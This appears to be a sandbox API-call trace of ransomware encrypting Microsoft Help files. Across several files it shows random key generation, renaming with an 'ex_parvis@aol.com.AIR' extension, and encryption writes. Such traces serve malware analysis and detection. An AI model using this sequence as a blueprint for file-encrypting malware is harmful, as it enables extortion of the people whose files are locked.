	[0100.710] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.710] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.710] ReadFile (in: hFile=0x4c0, lpBuffer=0x56b448, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.710] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.711] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.711] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.711] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.711] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.711] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 58
	[0100.711] GetProcessHeap () returned 0x540000
	[0100.711] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x601bd0
	[0100.711] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn"
	[0100.711] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.711] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.714] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.714] GetProcessHeap () returned 0x540000
	[0100.714] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.714] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=344) returned 1
	[0100.714] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x158
	[0100.714] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.714] GetProcessHeap () returned 0x540000
	[0100.714] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.714] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.714] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.715] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.715] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.715] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x158, lpOverlapped=0x0) returned 1
	[0100.715] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.715] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x158, lpOverlapped=0x0) returned 1
	[0100.716] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.716] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.716] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.716] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 56
	[0100.716] GetProcessHeap () returned 0x540000
	[0100.716] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x603bd0
	[0100.716] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn"
	[0100.716] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.716] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.719] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.719] GetProcessHeap () returned 0x540000
	[0100.719] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0100.719] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=332) returned 1
	[0100.719] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14c
	[0100.719] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.719] GetProcessHeap () returned 0x540000
	[0100.719] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.719] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.720] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.720] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.721] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.721] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x14c, lpOverlapped=0x0) returned 1
	[0100.721] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-332, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.721] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x14c, lpOverlapped=0x0) returned 1
	[0100.721] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.721] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.721] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.721] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 55
	[0100.721] GetProcessHeap () returned 0x540000
	[0100.721] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x603bd0
	[0100.721] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn"
	[0100.721] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.721] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.724] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.724] GetProcessHeap () returned 0x540000
	[0100.724] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0100.724] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=326) returned 1
	[0100.724] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x146
	[0100.724] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.724] GetProcessHeap () returned 0x540000
	[0100.724] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.724] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.724] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.726] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.726] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.726] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.726] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.726] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.727] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.727] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.727] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.727] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 59
	[0100.727] GetProcessHeap () returned 0x540000
	[0100.727] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x601bd0
	[0100.728] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn"
	[0100.728] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.728] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.730] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.730] GetProcessHeap () returned 0x540000
	[0100.730] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.730] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=350) returned 1
	[0100.730] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15e
	[0100.730] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.730] GetProcessHeap () returned 0x540000
	[0100.730] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.731] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.731] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.732] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.732] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.732] ReadFile (in: hFile=0x4c0, lpBuffer=0x597dc8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesRead=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.732] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.732] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.732] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.732] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.732] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.732] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 55
	[0100.732] GetProcessHeap () returned 0x540000
	[0100.733] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x603bd0
	[0100.733] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn"
	[0100.733] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.733] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.735] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.735] GetProcessHeap () returned 0x540000
	[0100.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0100.735] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=326) returned 1
	[0100.735] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x146
	[0100.735] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.735] GetProcessHeap () returned 0x540000
	[0100.735] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.736] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.736] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.737] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.737] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.737] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.737] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.737] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.737] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.737] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.737] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn", dwFileAttributes=0x80) returned 1
	[0100.737] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned 41
	[0100.737] GetProcessHeap () returned 0x540000
	[0100.738] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb8) returned 0x5a2048
